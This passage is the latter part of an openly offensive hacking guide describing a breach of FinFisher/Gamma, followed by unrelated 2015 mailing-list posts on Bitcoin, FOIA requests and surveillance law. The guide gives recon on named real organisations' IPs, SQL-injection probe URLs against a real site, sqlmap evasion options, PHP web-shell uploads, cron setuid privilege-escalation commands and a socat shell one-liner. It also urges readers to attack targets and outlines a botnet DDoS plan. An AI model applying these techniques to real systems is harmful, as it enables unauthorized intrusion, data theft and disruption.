While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target.


--[ 3 ]-- Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:

67.238.84.228   email.academi.com
67.238.84.242   extranet.academi.com
67.238.84.240   mail.academi.com
67.238.84.230   secure.academi.com
67.238.84.227   vault.academi.com
54.243.51.249   www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on Amazon Web Service, while the other IPs are in the range:

NetRange:       67.238.84.224 - 67.238.84.255
CIDR:           67.238.84.224/27
CustName:       Blackwater USA
Address:        850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything.
Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:

54.236.143.203  careers.academi.com
67.132.195.12   academiproshop.com
67.238.84.236   te.academi.com
67.238.84.238   property.academi.com
67.238.84.241   teams.academi.com

If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:

"FinFisher GmbH" inurl:domaintools

finds gamma-international.de, which redirects to finsupport.finfisher.com

...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it.


--[ 4 ]-- Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.com/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/, webserver/backup/, webserver/phpinfo.php, and a few thousand other common mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP [5], and some combination of its automated tests along with manually poking around with the help of its intercepting proxy.

6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.

* I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google:
    allinurl:"Scripts/scripts.js.php"

* I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..."

But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:

* google allinurl:"Scripts/scripts.js.php" and find the other sites

* Notice they're all sql injectable in the first url parameter I try.

* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with the option --tamper='tamper/modsecurityversioned.py'

* Acquire the admin login information, login and upload a php shell [1] (the check for allowable file extensions was done client side in javascript), and download the website's source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in javascript, and if you're unauthenticated the admin page just sends you back to the login page with a Location header, but you can have your intercepting proxy filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the sqli (it's nice to have a dozen options to choose from). The other sites by the web designer all had an injectable print.php, so some quick requests to:

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in!

--[ 5 ]-- (fail at) Escalating

 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
        ^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root.
    The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
    WARNING: /etc/cron.hourly/webalizer is run by cron as root.
    The user www-data can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:

    chown root:root /path/to/my_setuid_shell
    chmod 04755 /path/to/my_setuid_shell

wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network.

--[ 6 ]-- Pivoting

The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware.

--[ 7 ]-- Have Fun

Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:

1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make do with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2!

--[ 8 ]-- Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are:

1) Exploits in web browsers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browser/java/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

--[ 9 ]-- Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
  (all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
  One trick it leaves out is that on most systems the apache access log is readable only by root, but you can still include from /proc/self/fd/10 or whatever fd apache opened it as. It would also be more useful if it mentioned what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
  Get usable reverse shells with a statically linked copy of socat to drop on your target and:
    target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
    host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
  It's also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker's Handbook
* Hacking: The Art of Exploitation
* The Database Hacker's Handbook
* The Art of Software Security Assessment
* A Bug Hunter's Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them.
This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc.

--[ 10 ]-- Outro

You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!

From grarpamp at gmail.com Wed Jul 8 00:40:47 2015
From: grarpamp at gmail.com (grarpamp)
Date: Wed, 8 Jul 2015 03:40:47 -0400
Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users
Message-ID:

http://arstechnica.com/tech-policy/2015/07/senate-advances-secret-plan-forcing-internet-services-to-report-terror-activity/
https://www.washingtonpost.com/world/national-security/lawmakers-want-internet-sites-to-flag-terrorist-activity-to-law-enforcement/2015/07/04/534a0bca-20e9-11e5-84d5-eb37ee8eaa61_story.html
http://www.burr.senate.gov/press/releases/senate-intelligence-committee-advances-fy2016-authorization-bill

The Senate Intelligence Committee secretly voted on June 24 in favor of legislation requiring e-mail providers and social media sites to report suspected terrorist activities. The legislation, approved 15-0 in a closed-door hearing, remains "classified."
The relevant text is contained in the 2016 intelligence authorization...

From coderman at gmail.com Wed Jul 8 04:32:09 2015
From: coderman at gmail.com (coderman)
Date: Wed, 8 Jul 2015 04:32:09 -0700
Subject: FOIPA adventures
In-Reply-To:
References:
Message-ID:

for all of you driving vehicles with hundreds of global variables around weird machines radio linked to strange networks,

the following new FOIAs:

https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19510/
@FBI
Use of Sudden unintended acceleration (SUA) or Unintended acceleration in the commission of a crime, including premeditated offenses of any kind. Please include suspicion of Sudden unintended acceleration (SUA) or suspicion of Unintended acceleration within the scope of this request, even if alternate cause determined. This search is to include any and all records, including cross-references and indirect mentions, including records outside the investigation main file. This is to include a search of each of the following record stores and interfaces: the Central Records System (CRS), the Automated Case Support system ("ACS") Investigative Case Management system ("ICM"), the Automated Case Support system ("ACS") Electronic Case File ("ECF"), and the Automated Case Support system ("ACS") Universal Index ("UNI"). Please include processing notes, even if request is denied in part. Please identify individuals responsible for any aspect of FOIA processing in the processing notes, along with explanation of their involvement if not typically assigned FOIA responsibilities for the record systems above.

@DoT
https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19509/

best regards,

From juan.g71 at gmail.com Wed Jul 8 00:52:11 2015
From: juan.g71 at gmail.com (Juan)
Date: Wed, 8 Jul 2015 04:52:11 -0300
Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users
In-Reply-To:
References:
Message-ID: <559cd699.c511370a.4f2c6.2444@mx.google.com>

On Wed, 8 Jul 2015 03:40:47 -0400 grarpamp wrote:

>
> The Senate Intelligence Committee secretly voted on June 24 in favor
> of legislation requiring e-mail providers and social media sites to
> report suspected terrorist activities. The legislation, approved 15-0
> in a closed-door hearing, remains "classified." The relevant text is
> contained in the 2016 intelligence authorization...

Damn! You grarpamp and your pals who 'own' the government, should have told your servants not to do that. What happened??

From l at odewijk.nl Tue Jul 7 15:50:04 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Wed, 8 Jul 2015 07:50:04 +0900
Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc]
In-Reply-To:
References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com>
Message-ID:

2015-07-08 7:27 GMT+09:00 Sean Lynch :

> What? Bitcoin exists so that rich people in western countries
>> especially the US can become even richer. So far it worked
>> pretty well.
>>
>
> Really? What rich person has gotten richer through Bitcoin so far?
> Remittances seem like the biggest use of Bitcoin at the moment. Sure,
> there's plenty of speculation, but your claim that Bitcoin's purpose is to
> make the rich richer is also speculation. And FUD.
>

Yours would be the Uncertainty and Doubt, I see.

Bitcoin is cold hard money - therefore benefiting those that can exploit it best. The more capital you have, the better you can exploit it. Therefore, the wealthy stand more to benefit from Bitcoin than anyone else. Any other effect would indicate softness of Bitcoin or some human issue.

It does prevent (certain forms of) suppression; it's very hard to censor financial transactions on the Bitcoin network. It also provides a great deal of financial and administrative utility to all in similar quantity, it levels the playing field of the poor/rich somewhat.

From l at odewijk.nl Tue Jul 7 16:21:48 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Wed, 8 Jul 2015 08:21:48 +0900
Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc]
In-Reply-To:
References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com>
Message-ID:

2015-07-08 7:53 GMT+09:00 Sean Lynch :

>
> Perhaps my response was a bit hyperbolic, but that is a very different
> claim than "Bitcoin exists so that rich people in western countries
> especially the US can become even richer."
>

Put on your Juanglasses and the difference is hardly perceptible ;)

Still not sure what to make of the guy's constant rant-mode. It just seems to cause defensive and less constructive argumentation.

From jya at pipeline.com Wed Jul 8 05:33:53 2015
From: jya at pipeline.com (John Young)
Date: Wed, 08 Jul 2015 08:33:53 -0400
Subject: [cryptome] Re: FOIPA adventures
In-Reply-To:
References:
Message-ID:

Quite nice compilation of sources configured to evade FOIA. Ever finer feigning requires ever finer seining.

Paraphrasing Charles Murray, "US's ever more manipulable legal system and ever increasing government regulations are essentially lawless. When governments transgress citizens' rights, revolution is not treason but the people's duty."

At 07:32 AM 7/8/2015, coderman wrote:
>for all of you driving vehicles with hundreds of global variables
>around weird machines radio linked to strange networks,
>
>the following new FOIAs:
>
>https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19510/
>@FBI
>Use of Sudden unintended acceleration (SUA) or Unintended acceleration
>in the commission of a crime, including premeditated offenses of any
>kind. Please include suspicion of Sudden unintended acceleration (SUA)
>or suspicion of Unintended acceleration within the scope of this
>request, even if alternate cause determined. This search is to include
>any and all records, including cross-references and indirect mentions,
>including records outside the investigation main file. This is to
>include a search of each of the following record stores and
>interfaces: the Central Records System (CRS), the Automated Case
>Support system ("ACS") Investigative Case Management system ("ICM"),
>the Automated Case Support system ("ACS") Electronic Case File
>("ECF"), and the Automated Case Support system ("ACS") Universal Index
>("UNI"). Please include processing notes, even if request is denied in
>part. Please identify individuals responsible for any aspect of FOIA
>processing in the processing notes, along with explanation of their
>involvement if not typically assigned FOIA responsibilities for the
>record systems above.
>
>
>@DoT
>https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19509/
>
>
>best regards,

From blukami at gmail.com Wed Jul 8 05:41:37 2015
From: blukami at gmail.com (Edd thompson)
Date: Wed, 8 Jul 2015 08:41:37 -0400
Subject: Bitcoin exchanges.
Message-ID:

Is there any way a person can get their paycheck direct deposit to a Bitcoin? So instead of a deposit to a checking account it goes to an exchange that converts it for you? And then is there a good way to access currency in rural areas?
I have seen a few videos and read overviews but they never get to how to make it practical for people not in big cities, hell it just doesn't seem practical at all unless you live near an exchange or are willing to do credit card transactions that cost on top of the exchange and make the currency traceable.

From Rayzer at riseup.net Wed Jul 8 08:58:19 2015
From: Rayzer at riseup.net (Razer)
Date: Wed, 08 Jul 2015 08:58:19 -0700
Subject: [from offlist] "Google is to surveillance capitalism what GM was to managerial capitalism"
In-Reply-To:
References: <559C3763.1000205@riseup.net>
Message-ID: <559D489B.4040207@riseup.net>

The pdf doesn't let you mail it?

Try the attached. It mailed for me. If it works for you note that all I did was save a renamed copy from inside Linux Viewer

RR

On 07/08/2015 03:03 AM, Cari Machet wrote:
>
> Thanks for posting it i cannot fucking cut and paste it to my friend
> in prison ... the downloaded pdf doesnt let you and the online one
> fucks up the formatting ... i will be able to at least send him this
>
> Pdf hatred
>
> On Jul 7, 2015 11:36 PM, "Razer" wrote:
> >
> > Big Other: Surveillance Capitalism and the Prospects of an Information
> > Civilization
> >
> > Shoshana Zuboff, Berkman Center for Internet & Society; Harvard
> > Business School
> >
> > April 4, 2015
>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Shoshana Zuboff - Big Other - Surveillance Capitalism and the Prospects of an Information.pdf
Type: application/pdf
Size: 317325 bytes
Desc: not available
URL:

From uwecerron at gmail.com Wed Jul 8 06:20:45 2015
From: uwecerron at gmail.com (uwecerron at gmail.com)
Date: Wed, 8 Jul 2015 09:20:45 -0400
Subject: Bitcoin exchanges.
In-Reply-To:
References:
Message-ID:

I thought bitpay had a payroll option.

Sent from my iPhone

> On Jul 8, 2015, at 8:41 AM, Edd thompson wrote:
>
> Is there any way a person can get their paycheck direct deposit to a Bitcoin? So instead of a deposit to a checking account it goes to an exchange that converts it for you? And then is there a good way to access currency in rural areas?
> I have seen a few videos and read overviews but they never get to how to make it practical for people not in big cities, hell it just doesn't seem practical at all unless you live near an exchange or are willing to do credit card transactions that cost on top of the exchange and make the currency traceable.

From l at odewijk.nl Tue Jul 7 18:05:23 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Wed, 8 Jul 2015 10:05:23 +0900
Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc]
In-Reply-To:
References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com>
Message-ID:

2015-07-08 9:08 GMT+09:00 Sean Lynch :

> A "litmus test" issue might be whether you think the NSA's expressed
> surprise over Snowden's leaks was genuine. I tend to think it was, and that
> his documents are genuine. I see no reason for the NSA to be substantially
> more competent than, say, the OPM.

There's absolutely no reason to think the NSA doesn't have a layered/multi-cell operation wherein a mere contractor is not given access to nation-essential secrets.
If there's a foreign spy you want him to penetrate what seems like a complete organisation. Why not give them what they want? There's lots of "more secure than FBI/CIA, less secure than 'we broke enigma' " work to be done, just put it in the public-facing independently operating organisation. Would you publish "we broke enigma" in a memo to the intranet? NSA didn't. NSA wouldn't get worse at what they do.

The real headbreaker is when this is a problem. It's basically not a problem until you're a threat to the absolute fundamentals of what the NSA is designed to protect. And what's that? Is it personal freedom, the advancement of the human race, and the minimization of suffering? Is it the maximization of some abstract profit? The concentration of power? Do the latter two pretty much amount to the first?

Intelligence laundering is a serious issue, of course, but running a clean organization would make the laundering exceedingly hard.

> They're each large organizations with no bottom line that attract people of
> flexible moral character who are attracted to power and/or job security.

I'm in Korea, I talked to a bunch of US soldiers stationed here. They're exceedingly good-hearted, well-intentioned, high-spirited guys. Many love their work, the tension, the seriousness and hone their performance for sport and need. The balance between trigger-happy and accident-adverse is delicate and they seem extensively coached to preserve the balance properly.

I've talked to some that like their state, but hate the FED. I've talked to some that think the US is bad but its enemies are worse. I've talked to some that have doubts about parts of the US, about corruption, but believe in democracy such that they believe the US is a fundamental force of good.

The lesson is: very moral people still do very immoral things for many, sometimes excellent, reasons.

> I don't think those traits tend to lead to effective organizations, as
> much as a number of Hollywood movies would like us to believe.

I think there's not much difference between organisations. Make sure people's motivations are sincere and that they put in the effort. There's apparently a serious issue with "human resource rot" where worse people get brought into orgs or people get unfocused or demotivated. Without a bottom line there's less penalty for it. Doesn't mean it will happen. Snowden sure shows a certain amount of rot in NSA_Public. The recent Trident leak shows that the UK's nuclear deterrent program is rotten to a ridiculous point, but seems to indicate the US does much better.

Who knows! ;)

From drwho at virtadpt.net Wed Jul 8 10:34:59 2015
From: drwho at virtadpt.net (The Doctor)
Date: Wed, 08 Jul 2015 10:34:59 -0700
Subject: Inquiry re. how to handle Glomar reply to FOIA request
In-Reply-To:
References: <559C8626.9070504@riseup.net>
Message-ID: <559D5F43.6010305@virtadpt.net>

On 07/08/2015 12:50 AM, coderman wrote:

> this is waaaay too wordy. one thing i've learned, is to keep any
> request as short, and laser guided as possible. some agencies
> will find whatever excuse they can to deny a request, and if one
> element of

The FBI and the Air Force have been known to tack on additional keywords with Boolean ANDs to FOIA requests specifically to make them so narrow that they won't match. Typically, overbroad requests will get kicked back as being such and you'll have to refile with more specific search terms.

> your query falls into the deny bin they'll send the whole thing
> back or deny outright as "unreasonable".

Yup.

-- 
The Doctor [412/724/301/703/415] [ZS]
PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

"In a world with lots of shadows, the rats will do very well." --David Brin

From list at sysfu.com Wed Jul 8 11:17:45 2015
From: list at sysfu.com (Seth)
Date: Wed, 08 Jul 2015 11:17:45 -0700
Subject: Bitcoin exchanges.
In-Reply-To:
References:
Message-ID:

On Wed, 08 Jul 2015 05:41:37 -0700, Edd thompson wrote:

> Is there any way a person can get their paycheck direct deposit to a
> Bitcoin? So instead of a deposit to a checking account it goes to an
> exchange that converts it for you?

Not aware of any services that perform this in an automated fashion. Might be an entrepreneurial opportunity.

> And then is there a good way to access currency in rural areas?

Are you talking about converting BTC back into fiat cash? I don't know of a way to do that either.

You want to consider signing up for an account at Purse.io. That will allow you to buy products on Amazon using BTC (at a significant discount I might add) where the products can then be shipped to a location of your choosing.

> I have seen a few videos and read overviews but they never get to how to
> make it practical for people not in big cities, hell it just doesn't seem
> practical at all unless you live near an exchange or are willing to do
> credit card transactions that cost on top of the exchange and make the
> currency traceable.

Having other people buy items for you via Purse.io might throw another of obfuscation into the mix, but you still have to have any physical goods shipped to an address, which doesn't really help if you want to perform untraceable transactions.

From carimachet at gmail.com Wed Jul 8 03:34:28 2015
From: carimachet at gmail.com (Cari Machet)
Date: Wed, 8 Jul 2015 13:34:28 +0300
Subject: Hacking Team has been hacked (hard)
In-Reply-To: <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com>
References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com>
Message-ID:

Hahhaha u r genius ... WRONG fucking fascist capitalist neo nazi fucks ... so fucked up

On Jul 6, 2015 9:57 AM, "Juan" wrote:

> they*
>

From coderman at gmail.com Wed Jul 8 15:56:50 2015
From: coderman at gmail.com (coderman)
Date: Wed, 8 Jul 2015 15:56:50 -0700
Subject: Hacking Team has been hacked (hard)
In-Reply-To:
References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> <559D4A13.6070301@riseup.net>
Message-ID:

On 7/8/15, Razer wrote:
> ... that may be from the day when
> people paid by the byte for internet service. Should I post the
> entirety? It's kinda long.

JYA and me and history prefer verbatim, and long since gone the days when bandwidth bytes begged brevity now, just /s TL;DR or ignore...
[ and yes the whole thing :P ] best regards, From coderman at gmail.com Wed Jul 8 15:58:39 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 15:58:39 -0700 Subject: Crypto Wars 2.0 Message-ID: "Security Researchers are “the antibodies of the digital immune system” @Infosecjen in Senate Judiciary hearing encouraging more modern CFAA" - https://twitter.com/joshcorman/status/618914661128380416 "we may give you a rash, make you irritated. but it is for your own good, earth humans." longer transcript: https://www.judiciary.senate.gov/meetings/cyber-crime-modernizing-our-legal-framework-for-the-information-age best regards, From mirimir at riseup.net Wed Jul 8 23:18:03 2015 From: mirimir at riseup.net (Mirimir) Date: Thu, 09 Jul 2015 00:18:03 -0600 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: <559E121B.90503@riseup.net> On 07/08/2015 12:17 PM, Seth wrote: > On Wed, 08 Jul 2015 05:41:37 -0700, Edd thompson wrote: > >> Is there and way a person can get their paycheck direct deposit to a >> Bitcoin? So instead of a deposit to a checking account it goes to an >> exchange that converts it for you? > > Not aware of any services that perform this in an automated fashion. > Might be a entrepreneurial opportunity. > >> And then is there a good way to access currency in rural areas? > > Are you talking about converting BTC back into fiat cash? I don't know > of a way to do that either. You can buy meatspace and online gift cards at egifter.com or gyft.com with Bitcoin. > You want to consider signing up for an account at Purse.io. That will > allow you to buy products on Amazon using BTC (at a significant discount > I might add) where the products can then be shipped to a location of > your choosing. 
> >> I have seen a few videos and read overviews but they never get to how to >> make it practical for people not in big cities, hell it just doesn't seem >> practical at all unless you live near an exchange or are willing to do >> credit card transactions that cost on top of the exchange and make the >> currency traceable. > > Having other people buy items for you via Purse.io might throw another > of obfuscation into the mix, but you still have to have any physical > goods shipped to an address, which doesn't really help if you want to > perform untraceable transactions. Getting stuff anonymously in meatspace is nontrivial. Mailbox and remailer services require photo ID. Another entrepreneurial opportunity. From coderman at gmail.com Thu Jul 9 00:34:25 2015 From: coderman at gmail.com (coderman) Date: Thu, 9 Jul 2015 00:34:25 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> Message-ID: On 7/8/15, coderman wrote: > ... > hacking fucks who deserve it is the best feeling in life :) > ... > die happy tomorrow level satisfaction! i should note i was referring to my prior life as Nevil Maskelyne (1863–1924) and the hack of Marconi's wireless telegraph for great justice. this life i am code janitor... best regards, From coderman at gmail.com Thu Jul 9 01:24:12 2015 From: coderman at gmail.com (coderman) Date: Thu, 9 Jul 2015 01:24:12 -0700 Subject: [cryptography] Supersingular Isogeny DH In-Reply-To: <559E13D3.8040602@dev-nu11.de> References: <54C5545F.3060600@gmail.com> <54C92127.5060900@dev-nu11.de> <54C92732.70202@gmail.com> <54C9C907.5090501@dev-nu11.de> <559E13D3.8040602@dev-nu11.de> Message-ID: On 7/8/15, Marcel wrote: > ... > So my question is, why do i need to random values m_A and n_A to compute > the torsiongroup E[l_A] and respectively the kernel K_A ? > > Why does is not suffice to use only 1 point to generate E[l_A] and > Kernel K_A ? 
it is late, and i may mis understand, yet the two are requisite for peers arriving at a shared secret by way of these constructed isogeny; and the random values necessary to not give too much (confirm secret values, without exposing secret values) i found this paper a helpful expansion on the subject: http://cacr.uwaterloo.ca/techreports/2014/cacr2014-20.pdf "In this paper, we mainly explore the efficiency of implementing recently proposed isogeny-based post-quantum public key cryptography..." specifically the graph on page 5. note that the key exchange relies on finding a path connecting vertices in a graph of supersingular isogenies - thus a pair on both ends, not just a pair arrived at among both participants. if this is clear as mud, i will try tomorrow on a fresh brain :) best regards, From mickeybob at gmail.com Thu Jul 9 03:49:52 2015 From: mickeybob at gmail.com (Michael Naber) Date: Thu, 9 Jul 2015 06:49:52 -0400 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: Yes: https://www.bitwage.co/ On Wed, Jul 8, 2015 at 8:41 AM, Edd thompson wrote: > Is there and way a person can get their paycheck direct deposit to a > Bitcoin? So instead of a deposit to a checking account it goes to an > exchange that converts it for you? And then is there a good way to access > currency in rural areas? > I have seen a few videos and read overviews but they never get to how to > make it practical for people not in big 